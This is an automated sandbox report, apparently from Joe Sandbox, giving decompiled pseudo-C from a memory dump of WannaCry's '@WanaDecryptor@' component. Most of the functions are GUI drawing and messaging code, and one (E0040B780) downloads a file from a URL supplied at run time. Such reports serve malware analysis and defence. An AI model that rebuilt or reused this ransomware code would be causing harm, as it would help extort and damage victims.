                                  							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  						}
                                  					} else {
                                  						if(_t87 != 0) {
                                  							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                  						}
                                  						_t75 =  *0x422210; // 0xb24228
                                  						 *((intOrPtr*)( *_t75 + 0xc))();
                                  						 *(_t93 + 0x241c) = 0xffffffff;
                                  						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                  					}
                                  				} else {
                                  					_t56 =  *(_t93 + 0x2430);
                                  					if(_t56 != 0) {
                                  						SendMessageA(_t56, 0x4e20, _t59, 0);
                                  					}
                                  					 *(_t93 + 0x241c) = _t59;
                                  					L21:
                                  					E0040DBF0(_t93 + 0x14);
                                  					_t45 = _t59;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                  				return _t45;
                                  			}

















                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
                                  • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                  • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                  				signed int _v0;
                                  				char _v4;
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				signed int _t29;
                                  				intOrPtr _t31;
                                  				long _t36;
                                  				intOrPtr _t38;
                                  				intOrPtr* _t41;
                                  				struct HWND__* _t47;
                                  				intOrPtr _t48;
                                  				long _t53;
                                  				struct HWND__* _t58;
                                  				signed int _t60;
                                  				intOrPtr* _t67;
                                  				signed int _t68;
                                  
                                  				_t67 = __ecx;
                                  				L00412FE6();
                                  				_t68 = __eax;
                                  				if((__eax & 0x00008000) != 0) {
                                  					_push( &_v8);
                                  					_push( &_v4);
                                  					L00412FFE();
                                  					if(_a4 == 0) {
                                  						_t60 = _v0;
                                  						_t41 = _v16;
                                  					} else {
                                  						_t58 =  *(__ecx + 0x20);
                                  						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                  						_t41 = _v16;
                                  						_t53 = _t36;
                                  						if(_t53 == _t41) {
                                  							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                  							_t58 =  *(_t67 + 0x6c);
                                  							if(_t53 - _t38 < _t58) {
                                  								_t53 = _t58 + _t38;
                                  							}
                                  						}
                                  						asm("cdq");
                                  						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                  					}
                                  					_t47 =  *(_t67 + 0x6c);
                                  					_t29 = _t47 + _t41;
                                  					if(_t60 <= _t29) {
                                  						if(_t60 >= _t41) {
                                  							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                  						}
                                  					} else {
                                  						_t60 = _t60 + _v12 - _t47 - _t41;
                                  						if(_t60 > _t29) {
                                  							_t60 = _t29;
                                  						}
                                  						_push(0);
                                  						if((_t68 & 0x00004000) == 0) {
                                  							_push(0x4000);
                                  							_push(0);
                                  							L00412DDC();
                                  						} else {
                                  							_push(0);
                                  							_push(0x4000);
                                  							L00412DDC();
                                  						}
                                  					}
                                  					_t48 = _v12;
                                  					_t31 = _t60 -  *(_t67 + 0x6c);
                                  					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                  					if(_t31 < _t48) {
                                  						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                  					}
                                  					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}





















                                  APIs
                                  • #3797.MFC42 ref: 00409C27
                                  • #6734.MFC42(?,?), ref: 00409C4E
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                  • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3797#4284#6734MessageSend
                                  • String ID:
                                  • API String ID: 1776784669-0
                                  • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                  • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                  • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				void* _v4;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v24;
                                  				void* __ebx;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t23;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				intOrPtr* _t33;
                                  				signed int _t42;
                                  				unsigned int _t44;
                                  				signed int _t45;
                                  				void* _t53;
                                  				intOrPtr _t65;
                                  				void* _t67;
                                  				intOrPtr _t68;
                                  				void* _t69;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041438B);
                                  				_t21 =  *[fs:0x0];
                                  				_push(_t21);
                                  				 *[fs:0x0] = _t68;
                                  				_push(__ecx);
                                  				_push(0x244);
                                  				L00412CEC();
                                  				_t33 = _t21;
                                  				_t69 = _t68 + 4;
                                  				_v16 = _t33;
                                  				_t53 = 0;
                                  				_v4 = 0;
                                  				if(_t33 == 0) {
                                  					_t33 = 0;
                                  				} else {
                                  					_t65 = _a16;
                                  					 *_t33 = 0;
                                  					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                  					if(_t65 != 0) {
                                  						asm("repne scasb");
                                  						_t42 =  !(__ecx | 0xffffffff);
                                  						_push(_t42);
                                  						L00412CEC();
                                  						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                  						asm("repne scasb");
                                  						_t44 =  !(_t42 | 0xffffffff);
                                  						_t67 = _t65 - _t44;
                                  						_t45 = _t44 >> 2;
                                  						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                  						_t69 = _t69 + 0x1c;
                                  						_t53 = 0;
                                  					}
                                  				}
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				_v4 = 0xffffffff;
                                  				_t23 = E00411C00(_t33);
                                  				 *0x4220dc = _t23;
                                  				if(_t23 == _t53) {
                                  					_push(8);
                                  					L00412CEC();
                                  					 *_t23 = 1;
                                  					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                  					 *[fs:0x0] = _v24;
                                  					return _t23;
                                  				} else {
                                  					if(_t33 != _t53) {
                                  						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                  						if(_t25 != _t53) {
                                  							_push(_t25);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                  						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                  						if(_t26 != _t53) {
                                  							_push(_t26);
                                  							L00412C98();
                                  							_t69 = _t69 + 4;
                                  						}
                                  						_push(_t33);
                                  						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                  						L00412C98();
                                  						_t69 = _t69 + 4;
                                  					}
                                  					 *[fs:0x0] = _v24;
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                  • #823.MFC42(?,?,?), ref: 00412849
                                  • #825.MFC42(?), ref: 004128B5
                                  • #825.MFC42(?), ref: 004128CE
                                  • #825.MFC42(00000000), ref: 004128DD
                                  • #823.MFC42(00000008), ref: 004128FA
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                  				intOrPtr _v12;
                                  				void _v259;
                                  				char _v260;
                                  				char _v264;
                                  				char _v284;
                                  				char _t15;
                                  				int _t19;
                                  				CHAR* _t25;
                                  				signed int _t26;
                                  				char* _t40;
                                  
                                  				_t26 = __ecx;
                                  				_t25 = _a4;
                                  				CreateDirectoryA(_t25, 0);
                                  				_t40 = _a8;
                                  				asm("repne scasb");
                                  				if( !(_t26 | 0xffffffff) == 1) {
                                  					L4:
                                  					return 0;
                                  				} else {
                                  					_t15 =  *0x421798; // 0x0
                                  					_v260 = _t15;
                                  					memset( &_v259, 0, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                  					_t19 = DeleteUrlCacheEntry(_t40);
                                  					_push(0);
                                  					_push(0);
                                  					_push( &_v264);
                                  					_push(_t40);
                                  					_push(0);
                                  					L004133CE();
                                  					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                  						DeleteFileA( &_v284);
                                  						goto L4;
                                  					} else {
                                  						DeleteFileA( &_v284);
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
                                  				intOrPtr _v4;
                                  				intOrPtr* _v24;
                                  				struct tagRECT _v40;
                                  				intOrPtr _v56;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				intOrPtr _v88;
                                  				intOrPtr _t34;
                                  				void* _t35;
                                  				void* _t53;
                                  				intOrPtr _t56;
                                  
                                  				 *[fs:0x0] = _t56;
                                  				_v40.right = 0;
                                  				_v40.top = 0x41679c;
                                  				_v4 = 0;
                                  				E00409D40( &(_v40.bottom), _a4, _a8);
                                  				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                  				L00412D5E();
                                  				L00413010();
                                  				_t34 =  *_v24;
                                  				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                  				L00412D52();
                                  				_v88 = 0x415c00;
                                  				_v56 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v64;
                                  				return _t35;
                                  			}

                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413620);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E30);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x824)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413870);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}
















                                  APIs
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v40;
                                  				intOrPtr _v48;
                                  				void* _v96;
                                  				void* _v100;
                                  				void* _v104;
                                  				void* _v108;
                                  				intOrPtr _v112;
                                  				void* _v128;
                                  				void* _v132;
                                  				void* _t20;
                                  				void* _t22;
                                  				void* _t39;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137A8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t42;
                                  				_t39 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                  					E004044C0(__ecx, 0);
                                  				}
                                  				L00412DD0();
                                  				_t20 = _t39 + 0x48;
                                  				_v8 = 0;
                                  				L00412DCA();
                                  				L00412DC4();
                                  				L00412DBE();
                                  				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                  				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                  				_push(_t20);
                                  				L00412DCA();
                                  				_v40 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v48;
                                  				return _t22;
                                  			}



















                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t9;
                                  
                                  				_t9 = _a4;
                                  				_push(_t9);
                                  				_push(0x407);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(0x408);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(2);
                                  				L00412CE6();
                                  				L00412D88();
                                  				return __eax;
                                  			}





                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
